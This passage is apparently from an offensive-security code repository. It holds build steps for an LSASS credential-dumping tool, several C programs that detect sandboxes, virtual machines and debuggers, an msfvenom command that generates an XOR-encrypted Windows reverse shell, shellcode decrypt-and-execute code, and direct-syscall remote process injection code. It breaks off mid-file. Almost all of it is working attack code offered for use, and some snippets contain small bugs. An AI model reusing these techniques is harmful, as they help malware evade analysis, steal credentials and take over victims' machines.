During installation, ensure you select the following workloads: 6 | - **Desktop development with C++** 7 | - **MSVC v142 - VS 2019 C++ x64/x86 build tools** 8 | - **Windows 10 SDK** 9 | - **Windows 11 SDK** 10 | 11 | ### **2. Add MASM (Assembly) Support** 12 | MASM is not enabled by default in C++ projects. Here’s how to configure it: 13 | 14 | 1. Right-click the **Solution** in the Solution Explorer and select **Add > New Project**. 15 | 2. Choose **Empty Project**. 16 | 3. Add the assembly file (`Lsasssyscall.asm`) to this project: 17 | - Right-click **Source Files** in the Solution Explorer. 18 | - Select **Add > Existing Item** and choose your `Lsasssyscall.asm` file. 19 | - Right-click the project name, open **Build Dependencies > Build Customizations**, and enable **MASM**. 20 | - Right-click the project name, open **Properties > Linker > System**, and set **SubSystem** to **Console**. 21 | 22 | ### **4. Build the Project** 23 | 1. Set the build configuration to **Release** or **Debug** and **x64**. 24 | 2. Press **Ctrl+Shift+B** or go to **Build > Build Solution** to compile the project. 25 | 26 | 27 | ### **5. Run the Program** 28 | - Run the compiled executable (`LsassDumpSyscall.exe`) as an administrator. 29 | - Ensure the required privileges are enabled for the process (e.g., SE_DEBUG_NAME). 
30 | 31 | More details: https://programminghaven.home.blog/2020/02/16/setup-an-assembly-project-on-visual-studio-2019/ 32 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/UTC_time_zone.c: -------------------------------------------------------------------------------- 1 | /* 2 | Checks if time zone is Coordinated Universal Time (UTC), C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include "Windows.h" 9 | #include "stdio.h" 10 | 11 | int main(int argc, char** argv[]) { 12 | TIME_ZONE_INFORMATION timeZone; 13 | DWORD ret = GetTimeZoneInformation(&timeZone); 14 | 15 | if (ret == TIME_ZONE_ID_INVALID) { 16 | printf("Unable to retrieve time zone informaiton, exiting.\n"); 17 | getchar(); 18 | exit(-1); 19 | } else { 20 | if (!wcscmp(L"Coordinated Universal Time", timeZone.DaylightName) || !wcscmp(L"Coordinated Universal Time", timeZone.StandardName)) { 21 | wprintf(L"The time zone is Coordinated Universal Time (UTC), do not proceed.\n"); 22 | } else { 23 | wprintf(L"The time zone is %s. 
Proceed!\n", timeZone.DaylightName); 24 | } 25 | } 26 | 27 | getchar(); 28 | return 0; 29 | 30 | } 31 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/check_all_DLL_names.c: -------------------------------------------------------------------------------- 1 | /* 2 | Checks all DLL names loaded by each process, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | 12 | #define numSandboxDLLs 7 13 | 14 | WCHAR* sandboxDLLs[numSandboxDLLs] = { L"sbiedll.dll", L"dbghelp.dll", L"api_log.dll", L"dir_watch.dll", L"pstorec.dll", L"vmcheck.dll", L"wpespy.dll" }; 15 | 16 | int main(void) { 17 | DWORD loadedProcesses[1024]; 18 | DWORD cbNeeded; 19 | DWORD cProcesses; 20 | unsigned int i; 21 | 22 | // Get all PIDs 23 | if (!EnumProcesses(loadedProcesses, sizeof(loadedProcesses), &cbNeeded)) { 24 | printf("[---] Could not get all PIDs, exiting.\n"); 25 | getchar(); 26 | exit(-1); 27 | } 28 | 29 | // Calculate how many PIDs returned 30 | cProcesses = cbNeeded / sizeof(DWORD); 31 | 32 | // Check all loaded DLLs 33 | HANDLE hProcess; 34 | int evidenceCount = 0; 35 | for (i = 0; i < cProcesses; i++) { 36 | HMODULE hMods[1024]; 37 | 38 | // Get a handle to the process. 39 | hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, loadedProcesses[i]); 40 | if (hProcess != NULL) { 41 | 42 | // Get a list of all the modules in this process. 43 | if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) { 44 | for (int i = 0; i < (cbNeeded / sizeof(HMODULE)); i++) { 45 | TCHAR szModName[MAX_PATH]; 46 | // Get the full path to the module's file. 47 | if (GetModuleFileNameEx(hProcess, hMods[i], szModName, sizeof(szModName) / sizeof(TCHAR))) { 48 | for (int j = 0; jBeingDebugged) { 17 | printf("A debugger is present, do not proceed."); 18 | } else { 19 | printf("No debugger is present. 
Proceed!"); 20 | } 21 | 22 | getchar(); 23 | return 0; 24 | 25 | } -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/filepath_existence.c: -------------------------------------------------------------------------------- 1 | /* 2 | Filepath existence checker, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #include "Shlwapi.h" 12 | #pragma comment(lib, "Shlwapi.lib") 13 | 14 | #define numFiles 32 15 | 16 | int main(int argc, char **argv[]) { 17 | 18 | LPCWSTR filePaths[numFiles] = { L"C:\\windows\\Sysnative\\Drivers\\Vmmouse.sys", 19 | L"C:\\windows\\Sysnative\\Drivers\\vm3dgl.dll", L"C:\\windows\\Sysnative\\Drivers\\vmdum.dll", 20 | L"C:\\windows\\Sysnative\\Drivers\\vm3dver.dll", L"C:\\windows\\Sysnative\\Drivers\\vmtray.dll", 21 | L"C:\\windows\\Sysnative\\Drivers\\vmci.sys", L"C:\\windows\\Sysnative\\Drivers\\vmusbmouse.sys", 22 | L"C:\\windows\\Sysnative\\Drivers\\vmx_svga.sys", L"C:\\windows\\Sysnative\\Drivers\\vmxnet.sys", 23 | L"C:\\windows\\Sysnative\\Drivers\\VMToolsHook.dll", L"C:\\windows\\Sysnative\\Drivers\\vmhgfs.dll", 24 | L"C:\\windows\\Sysnative\\Drivers\\vmmousever.dll", L"C:\\windows\\Sysnative\\Drivers\\vmGuestLib.dll", 25 | L"C:\\windows\\Sysnative\\Drivers\\VmGuestLibJava.dll", L"C:\\windows\\Sysnative\\Drivers\\vmscsi.sys", 26 | L"C:\\windows\\Sysnative\\Drivers\\VBoxMouse.sys", L"C:\\windows\\Sysnative\\Drivers\\VBoxGuest.sys", 27 | L"C:\\windows\\Sysnative\\Drivers\\VBoxSF.sys", L"C:\\windows\\Sysnative\\Drivers\\VBoxVideo.sys", 28 | L"C:\\windows\\Sysnative\\vboxdisp.dll", L"C:\\windows\\Sysnative\\vboxhook.dll", 29 | L"C:\\windows\\Sysnative\\vboxmrxnp.dll", L"C:\\windows\\Sysnative\\vboxogl.dll", 30 | L"C:\\windows\\Sysnative\\vboxoglarrayspu.dll", L"C:\\windows\\Sysnative\\vboxoglcrutil.dll", 31 | L"C:\\windows\\Sysnative\\vboxoglerrorspu.dll", 
L"C:\\windows\\Sysnative\\vboxoglfeedbackspu.dll", 32 | L"C:\\windows\\Sysnative\\vboxoglpackspu.dll", L"C:\\windows\\Sysnative\\vboxoglpassthroughspu.dll", 33 | L"C:\\windows\\Sysnative\\vboxservice.exe", L"C:\\windows\\Sysnative\\vboxtray.exe", 34 | L"C:\\windows\\Sysnative\\VBoxControl.exe"}; 35 | 36 | 37 | int evidenceCount = 0; 38 | for (int i=0; i < numFiles; ++i) { 39 | if (PathFileExists(filePaths[i])) { 40 | wprintf(filePaths[i]); 41 | wprintf("\n"); 42 | ++evidenceCount; 43 | } 44 | } 45 | 46 | if (evidenceCount == 0) { 47 | printf("No files exist on disk that suggest we are running in a sandbox. Proceed!\n"); 48 | } 49 | 50 | getchar(); 51 | return 0; 52 | } 53 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/hostname.c: -------------------------------------------------------------------------------- 1 | /* 2 | Hostname checker, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | int wmain(int agrc, wchar_t **argv[]) { 12 | 13 | WCHAR* computerName[3267]; 14 | DWORD charCount[3267]; 15 | 16 | if (!GetComputerNameW(&computerName, &charCount)) { 17 | printf("Could not read computer name, exiting.\n"); 18 | getchar(); 19 | exit(-1); 20 | } 21 | 22 | if (!wcsicmp(computerName, argv[1])) { 23 | printf("Proceed!\n"); 24 | } else { 25 | wprintf(L"Hostname: %s", computerName); 26 | } 27 | 28 | getchar(); 29 | return 0; 30 | } -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/mac_address.c: -------------------------------------------------------------------------------- 1 | /* 2 | MAC address checker, C 3 | Most code taken from https://msdn.microsoft.com/en-us/library/windows/desktop/aa366062(v=vs.85).aspx 4 | Module written by Brandon Arvanaghi 5 | Website: arvanaghi.com 6 | Twitter: @arvanaghi 7 | */ 8 | 9 | #include 10 | #include 11 | 
// NOTE(review): the header name on this #include line was lost when the listing was rendered.
#include
#pragma comment(lib, "IPHLPAPI.lib")

/*
 * Walks the adapter list returned by GetAdaptersInfo, compares the first three
 * bytes of each adapter's hardware address with a five-entry OUI table and
 * prints every adapter address that matches. Exits with -1 when the adapter
 * list cannot be read.
 */
int main(int argc, char** argv[]) {
    // NOTE(review): never initialised. It is only ever assigned TRUE below, so the
    // final `if (!evidenceOfSandbox)` reads an indeterminate value whenever no
    // adapter matched.
    boolean evidenceOfSandbox;
    PIP_ADAPTER_INFO pAdapterInfo;
    PIP_ADAPTER_INFO pAdapter = NULL;

    // First three bytes of known Virtual Machine MAC addresses (e.g. 00-0C-29...)
    unsigned char badMacAddresses[5][3] = {
        { 0x00, 0x0C, 0x29 },
        { 0x00, 0x1C, 0x14 },
        { 0x00, 0x50, 0x56 },
        { 0x00, 0x05, 0x69 },
        { 0x08, 0x00, 0x27 }
    };

    ULONG ulOutBufLen = sizeof(IP_ADAPTER_INFO);
    // NOTE(review): neither malloc() result is checked before it is passed to GetAdaptersInfo.
    pAdapterInfo = (IP_ADAPTER_INFO *)malloc(sizeof(IP_ADAPTER_INFO));

    // Make an initial call to GetAdaptersInfo to get the necessary size into the ulOutBufLen variable
    if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW) {
        free(pAdapterInfo);
        pAdapterInfo = (IP_ADAPTER_INFO *)malloc(ulOutBufLen);
    }

    if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == NO_ERROR) {
        pAdapter = pAdapterInfo;
        while (pAdapter) { // for each adapter
            for (int i = 0; i < 5; ++i) { // check each row of bad MAC address table
                // Only the three-byte OUI prefix is compared, never the full address.
                if (!memcmp(badMacAddresses[i], pAdapter->Address, 3)) {
                    // Print the whole address as XX-XX-...-XX. AddressLength is
                    // unsigned, so `j < AddressLength` is a signed/unsigned comparison.
                    for (int j = 0; j < pAdapter->AddressLength; ++j) {
                        if (j == (pAdapter->AddressLength - 1)) {
                            printf("%.2X\n", (int)pAdapter->Address[j]);
                        } else {
                            printf("%.2X-", (int)pAdapter->Address[j]);
                        }
                    }
                    evidenceOfSandbox = TRUE;
                }
            }

            pAdapter = pAdapter->Next;
        }
    } else { // GetAdaptersInfo failed
        printf("[---] GetAdaptersInfo failed, exiting.\n");
        exit(-1);
        // NOTE(review): unreachable, exit() does not return; pAdapterInfo is not
        // freed on this path either.
        getchar();
    }

    if (pAdapterInfo) {
        free(pAdapterInfo);
    }

    if (!evidenceOfSandbox) {
        printf("No MAC addresses match known virtual machine MAC addresses. Proceed!\n");
    }

    getchar();
    return 0;
}
--------------------------------------------------------------------------------
/Evasion Techniques/Sandbox Evasion/minimum_num_running_processes.c:
--------------------------------------------------------------------------------
/*
Ensures at least N processes are currently running on the system (default: 50), C
Module written by Brandon Arvanaghi
Website: arvanaghi.com
Twitter: @arvanaghi
*/

// NOTE(review): the header names on these three #include lines were lost when the listing was rendered.
#include
#include
#include

/*
 * Reads the PID list with EnumProcesses and compares its length with a
 * baseline of 50, or with argv[1] when one is given. Exits with -1 when
 * EnumProcesses fails.
 *
 * NOTE(review): the prototype is `char **argv[]` (char ***), not the usual
 * `char **argv`, so the argv[1] handed to atoi() below is a char **.
 */
int main(int argc, char **argv[]) {
    int minNumProcesses = 50;

    if (argc > 1) {
        // atoi() reports no errors: non-numeric input yields 0 and a negative
        // value is accepted unchanged.
        minNumProcesses = atoi(argv[1]);
    }

    DWORD loadedProcesses[1024];
    DWORD cbNeeded;
    DWORD runningProcesses;

    // Get all PIDs
    // NOTE(review): the array is a fixed 1024 entries and the call gives no
    // signal when more PIDs exist than fit; if cbNeeded comes back equal to
    // sizeof(loadedProcesses) the count computed below may be truncated.
    if (!EnumProcesses(loadedProcesses, sizeof(loadedProcesses), &cbNeeded)) {
        printf("[---] Could not get all PIDs, exiting.\n");
        getchar();
        exit(-1);
    }

    // Calculate how many PIDs returned
    runningProcesses = cbNeeded / sizeof(DWORD);

    // NOTE(review): DWORD compared with int. A negative minNumProcesses converts
    // to a large unsigned value, so the "satisfies" branch is never taken for it.
    // Both printf calls pass a DWORD to a "%d" conversion.
    if (runningProcesses >= minNumProcesses) {
        printf("There are %d processes running on the system, which satisfies the minimum you set of %d. Proceed!\n", runningProcesses, minNumProcesses);
    } else {
        printf("Only %d processes are running on the system, which is less than the minimum you set of %d. Do not proceed.\n", runningProcesses, minNumProcesses);
    }

    getchar();
    return 0;
}
--------------------------------------------------------------------------------
/Evasion Techniques/Sandbox Evasion/prevent_debugging.c:
--------------------------------------------------------------------------------
/*
Prevents a debugger from attaching to this process after it has been loaded, C
Module written by Brandon Arvanaghi
Website: arvanaghi.com
Twitter: @arvanaghi
*/

#include "Windows.h"
#include "Winternl.h"
#include "stdio.h"

/*
 * Sets the BeingDebugged byte of this process's own PEB and prints a message.
 *
 * NOTE(review): __readfsdword(0x30) reads the PEB pointer from the 32-bit TEB,
 * so this module only compiles and works in an x86 (32-bit) build.
 */
int main(int argc, char **argv[]) {

    PPEB pPEB = (PPEB)__readfsdword(0x30);

    // Pretend process is already being debugged by setting PEB's BeingDebugged byte to 1
    // Only one debugger can attach to a process at a time.
    pPEB->BeingDebugged = 1;

    // NOTE(review): this statement has no terminating ';' and does not compile as written.
    printf("The Process Environment Block's \"BeingDebugged\" field is set. Proceed!")

    getchar();
    return 0;

}
--------------------------------------------------------------------------------
/Evasion Techniques/Sandbox Evasion/processors.c:
--------------------------------------------------------------------------------
/*
Minimum number of Processors, C
Module written by Brandon Arvanaghi
Website: arvanaghi.com
Twitter: @arvanaghi
*/

// NOTE(review): the header names on these two #include lines were lost when the listing was rendered.
#include
#include

/*
 * Compares dwNumberOfProcessors from GetSystemInfo with a baseline of 2, or
 * with argv[1] when one is given. The count is printed on both paths;
 * "Proceed!" is printed only when the count is at least the baseline.
 *
 * NOTE(review): as in the sibling modules the prototype is `char **argv[]`
 * (char ***), and atoi() accepts a negative or non-numeric baseline silently;
 * a negative baseline is satisfied by any processor count.
 */
int main(int argc, char **argv[]) {
    int minProcessors = 2;
    if (argc > 1) {
        minProcessors = atoi(argv[1]);
    }

    SYSTEM_INFO systemInfo;
    GetSystemInfo(&systemInfo);
    // dwNumberOfProcessors is a DWORD; it is narrowed to int here.
    int numProcessors = systemInfo.dwNumberOfProcessors;

    if (numProcessors >= minProcessors) {
        printf("Number of processors: %d\n", numProcessors);
        printf("Proceed!\n");
    } else {
        printf("Number of processors: %d\n", numProcessors);
    }

    getchar();
    return 0;
}
-------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/processorsCount.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() 4 | { 5 | SYSTEM_INFO info; 6 | ::GetNativeSystemInfo(&info); 7 | if (info.dwNumberOfProcessors < 2) 8 | { 9 | return -99; 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/ram.c: -------------------------------------------------------------------------------- 1 | /* 2 | Minimum amount of RAM, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | int main() { 12 | MEMORYSTATUSEX memStat; 13 | 14 | memStat.dwLength = sizeof(memStat); 15 | GlobalMemoryStatusEx(&memStat); 16 | 17 | if ((float)memStat.ullTotalPhys / 1073741824 > 1) { 18 | printf("The RAM of this host is at least 1 GB in size. Proceed!\n"); 19 | } else { 20 | printf("Less than 1 GB of RAM exists on this system. 
Do not proceed.\n"); 21 | } 22 | 23 | getchar(); 24 | return 0; 25 | } 26 | 27 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/registry.c: -------------------------------------------------------------------------------- 1 | /* 2 | Windows Registry key and value checker, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #pragma comment(lib, "Shlwapi.lib") 12 | 13 | int main() { 14 | HKEY hKey; 15 | int evidenceOfSandbox = 0; 16 | 17 | const char *sandboxStrings[5] = { "VMWare", "virtualbox", "vbox", "qemu", "xen" }; 18 | 19 | const char *HKLM_Keys_To_Check_Exist[7] = { "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0\\Identifier", 20 | "SYSTEM\\CurrentControlSet\\Enum\\SCSI\\Disk&Ven_VMware_&Prod_VMware_Virtual_S", 21 | "SYSTEM\\CurrentControlSet\\Control\\CriticalDeviceDatabase\\root#vmwvmcihostdev", 22 | "SYSTEM\\CurrentControlSet\\Control\\VirtualDeviceDrivers", 23 | "SOFTWARE\\VMWare, Inc.\\VMWare Tools", 24 | "SOFTWARE\\Oracle\\VirtualBox Guest Additions", 25 | "HARDWARE\\ACPI\\DSDT\\VBOX_" }; 26 | 27 | const char *HKLM_Keys_With_Values_To_Parse[6][2] = { 28 | { "SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0" }, 29 | { "HARDWARE\\Description\\System", "SystemBiosInformation" }, 30 | { "HARDWARE\\Description\\System", "VideoBiosVersion" }, 31 | { "HARDWARE\\Description\\System\\BIOS", "SystemManufacturer" }, 32 | { "HARDWARE\\Description\\System\\BIOS", "SystemProductName" }, 33 | { "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0", "Logical Unit Id 0" } 34 | }; 35 | 36 | for (int i = 0; i < 7; ++i) { 37 | if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, HKLM_Keys_To_Check_Exist[i], 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 38 | printf("%s\n", HKLM_Keys_To_Check_Exist[i]); 39 | RegCloseKey(hKey); 40 | ++evidenceOfSandbox; 41 | } 42 | } 43 | 44 | for (int 
i = 0; i < 6; ++i) { 45 | HKEY hKey; 46 | TCHAR buff[1024] = { 0 }; 47 | DWORD buffSize = 1024; 48 | if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, HKLM_Keys_With_Values_To_Parse[i][0], 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 49 | if (RegQueryValueExA(hKey, HKLM_Keys_With_Values_To_Parse[i][1], NULL, NULL, (LPBYTE)buff, &buffSize) == ERROR_SUCCESS) { 50 | for (int j = 0; j < 5; ++j) { 51 | if (StrStrIA(buff, sandboxStrings[j]) != NULL) { 52 | printf("%s\\%s --> %s \n", HKLM_Keys_With_Values_To_Parse[i][0], HKLM_Keys_With_Values_To_Parse[i][1], buff); 53 | ++evidenceOfSandbox; 54 | } 55 | } 56 | } 57 | RegCloseKey(hKey); 58 | } 59 | } 60 | 61 | if (evidenceOfSandbox == 0) { 62 | printf("Proceed!\n"); 63 | } 64 | 65 | getchar(); 66 | 67 | return 0; 68 | } 69 | 70 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/usb.c: -------------------------------------------------------------------------------- 1 | /* 2 | Minimum number of USB devices ever mounted, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | int main(int argc, char **argv[]) { 12 | HKEY hKey; 13 | // Baseline number of USBs ever mounted 14 | int MinimumUsbHistory = 2; 15 | // To store actual number of USBs ever mounted 16 | DWORD numUsbDevices = 0; 17 | 18 | // If user supplies a different baseline 19 | if (argc > 1) { 20 | MinimumUsbHistory = atoi(argv[1]); 21 | } 22 | 23 | if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Enum\\USBSTOR", 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 24 | 25 | // Get number of subkeys, which corresponds to history of mounted USB devices 26 | if (RegQueryInfoKeyA(hKey, NULL, NULL, NULL, &numUsbDevices, NULL, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) { 27 | // Do nothing 28 | } else { 29 | printf("[---] Unable to query subkey HKLM::SYSTEM\\ControlSet001\\Enum\\USBSTOR\n"); 30 | getchar(); 31 | exit(-1); 32 | } 
33 | } else { 34 | printf("[---] Unable to open subkey HKLM::SYSTEM\\ControlSet001\\Enum\\USBSTOR\n"); 35 | getchar(); 36 | exit(-1); 37 | } 38 | 39 | 40 | if (numUsbDevices >= MinimumUsbHistory) { 41 | printf("Number of USB devices ever mounted: %d\n", numUsbDevices); 42 | printf("Proceed!\n"); 43 | } else { 44 | printf("Number of USB devices ever mounted: %d\n", numUsbDevices); 45 | } 46 | 47 | getchar(); 48 | return 0; 49 | } 50 | 51 | -------------------------------------------------------------------------------- /Evasion Techniques/Sandbox Evasion/username.c: -------------------------------------------------------------------------------- 1 | /* 2 | Username checker, C 3 | Module written by Brandon Arvanaghi 4 | Website: arvanaghi.com 5 | Twitter: @arvanaghi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | int wmain(int agrc, wchar_t **argv[]) { 12 | 13 | WCHAR* username[3267]; 14 | DWORD charCount[3267]; 15 | 16 | if (!GetUserName(username, charCount)) { 17 | printf("Could not read username, exiting.\n"); 18 | getchar(); 19 | exit(-1); 20 | } 21 | 22 | if (!wcsicmp(username, argv[1])) { 23 | printf("Proceed!\n"); 24 | } else { 25 | wprintf(L"Username: %s", username); 26 | } 27 | 28 | getchar(); 29 | return 0; 30 | } -------------------------------------------------------------------------------- /Evasion Techniques/Shellcode Encryption and Decryption/MSF_Xor_Encrypt.sh: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 --encrypt xor --encrypt-key test -f c -o enc.c -------------------------------------------------------------------------------- /Evasion Techniques/Shellcode Encryption and Decryption/Xor_Decrypt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | unsigned char buf[] = "xored_payload"; 5 | 6 | void x(char *payload, int payload_length, char *key, int length) { 7 | int j = 0; 8 | 9 | 
for (int i = 0; i < payload_length - 1; i++) { 10 | if (j == length - 1) j = 0; 11 | payload[i] ^= key[j]; 12 | unsigned char data = payload[i] ^ key[j]; 13 | j++; 14 | } 15 | } 16 | 17 | int main() 18 | { 19 | char key[] = "test"; 20 | x((char*)buf, sizeof(buf), key, sizeof(key)); 21 | 22 | //From here on out the shellcode is decrypted and can be executed 23 | void *exec = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 24 | memcpy(exec, buf, sizeof(buf)); 25 | ((void(*)())exec)(); 26 | } -------------------------------------------------------------------------------- /Evasion Techniques/Shellcode Encryption and Decryption/Xor_Encrypt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | unsigned char buf[] = "non encrypted payload"; 5 | 6 | void encrypt(char *payload, int payload_length, char *key, int length) { 7 | int j = 0; 8 | 9 | for (int i = 0; i < payload_length; i++) { 10 | if (j == length - 1) j = 0; 11 | payload[i] ^= key[j]; 12 | j++; 13 | } 14 | } 15 | 16 | int main() 17 | { 18 | char key[] = "test"; 19 | encrypt(buf, sizeof(buf), key, sizeof(key)); 20 | } -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/Direct Syscalls/DirectSyscalls.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Credit: https://github.com/JohnWoodman/stealthInjector 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | #include "getSyscall.h" 9 | 10 | #pragma comment(lib, "ntdll.lib") 11 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 12 | 13 | using myNtAllocateVirutalMemory = NTSTATUS(NTAPI*)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect); 14 | 15 | using myNtWriteVirtualMemory = NTSTATUS(NTAPI*)(HANDLE ProcessHandle, LPVOID BaseAddress, char* Buffer, ULONG RegionSize, PULONG numBytesWritten); 16 | 17 | using 
myNtCreateThreadEx = NTSTATUS(NTAPI*)(PHANDLE hThread, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, HANDLE ProcessHandle, PVOID lpStartAddress, PVOID lpParameter, ULONG Flags, SIZE_T ZeroBits, SIZE_T SizeOfStackCommit, SIZE_T SizeOfStackReserve, PVOID lpBytesBuffer); 18 | 19 | char buf[] = ""; 20 | 21 | int main(int argc, char *argv[]) { 22 | LPVOID allocation_start; 23 | STARTUPINFO si; 24 | PROCESS_INFORMATION pi; 25 | LPCSTR cmd; 26 | myNtAllocateVirutalMemory NtAllocateVirtualMemory; 27 | myNtWriteVirtualMemory NtWriteVirtualMemory; 28 | myNtCreateThreadEx NtCreateThreadEx; 29 | SIZE_T RegionSize = (SIZE_T)sizeof(buf); 30 | HANDLE hThread; 31 | HANDLE procHandle; 32 | 33 | char syscallStub_NtAlloc[SYSCALL_STUB_SIZE] = {}; 34 | char syscallStub_NtWrite[SYSCALL_STUB_SIZE] = {}; 35 | char syscallStub_NtCreate[SYSCALL_STUB_SIZE] = {}; 36 | DWORD oldProtection = 0; 37 | 38 | // define NtAllocateVirtualMemory 39 | NtAllocateVirtualMemory = (myNtAllocateVirutalMemory)(LPVOID)syscallStub_NtAlloc; 40 | VirtualProtect(syscallStub_NtAlloc, SYSCALL_STUB_SIZE, PAGE_EXECUTE_READWRITE, &oldProtection); 41 | 42 | // define NtWriteVirtualMemory 43 | NtWriteVirtualMemory = (myNtWriteVirtualMemory)(LPVOID)syscallStub_NtWrite; 44 | VirtualProtect(syscallStub_NtWrite, SYSCALL_STUB_SIZE, PAGE_EXECUTE_READWRITE, &oldProtection); 45 | 46 | // define NtCreateThreadEx 47 | NtCreateThreadEx = (myNtCreateThreadEx)(LPVOID)syscallStub_NtCreate; 48 | VirtualProtect(syscallStub_NtCreate, SYSCALL_STUB_SIZE, PAGE_EXECUTE_READWRITE, &oldProtection); 49 | 50 | // get syscall stubs 51 | GetSyscallStub("NtAllocateVirtualMemory", syscallStub_NtAlloc); 52 | GetSyscallStub("NtWriteVirtualMemory", syscallStub_NtWrite); 53 | GetSyscallStub("NtCreateThreadEx", syscallStub_NtCreate); 54 | 55 | allocation_start = nullptr; 56 | 57 | printf("[*] Injecting into remote process using direct syscalls\n\n"); 58 | 59 | procHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 4568); 60 | 
NtAllocateVirtualMemory(procHandle, &allocation_start, 0, (PULONG)&RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 61 | NtWriteVirtualMemory(procHandle, allocation_start, buf, sizeof(buf), 0); 62 | NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, procHandle, allocation_start, allocation_start, FALSE, NULL, NULL, NULL, NULL); 63 | 64 | } 65 | -------------------------------------------------------------------------------- /Evasion Techniques/SysCall Examples/Direct Syscalls/NtOpenProcess.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Based on 3 | https://cocomelonc.github.io/tutorial/2021/12/11/malware-injection-11.html 4 | */ 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #pragma comment(lib, "ntdll") 11 | 12 | #define InitializeObjectAttributes(p,n,a,r,s) { \ 13 | (p)->Length = sizeof(OBJECT_ATTRIBUTES); \ 14 | (p)->RootDirectory = (r); \ 15 | (p)->Attributes = (a); \ 16 | (p)->ObjectName = (n); \ 17 | (p)->SecurityDescriptor = (s); \ 18 | (p)->SecurityQualityOfService = NULL; \ 19 | } 20 | 21 | typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)( 22 | HANDLE ProcessHandle, 23 | PVOID *BaseAddress, 24 | ULONG ZeroBits, 25 | PULONG RegionSize, 26 | ULONG AllocationType, 27 | ULONG Protect 28 | ); 29 | 30 | // dt nt!_UNICODE_STRING 31 | typedef struct _UNICODE_STRING 32 | { 33 | USHORT Length; 34 | USHORT MaximumLength; 35 | PWSTR Buffer; 36 | } UNICODE_STRING, *PUNICODE_STRING; 37 | 38 | // dt nt!_OBJECT_ATTRIBUTES 39 | typedef struct _OBJECT_ATTRIBUTES { 40 | ULONG Length; 41 | HANDLE RootDirectory; 42 | PUNICODE_STRING ObjectName; 43 | ULONG Attributes; 44 | PVOID SecurityDescriptor; 45 | PVOID SecurityQualityOfService; 46 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 47 | 48 | // dt nt!_CLIENT_ID 49 | typedef struct _CLIENT_ID { 50 | PVOID UniqueProcess; 51 | PVOID UniqueThread; 52 | } CLIENT_ID, *PCLIENT_ID; 53 | 54 | typedef NTSTATUS(NTAPI* pNtOpenProcess)( 55 | PHANDLE ProcessHandle, 
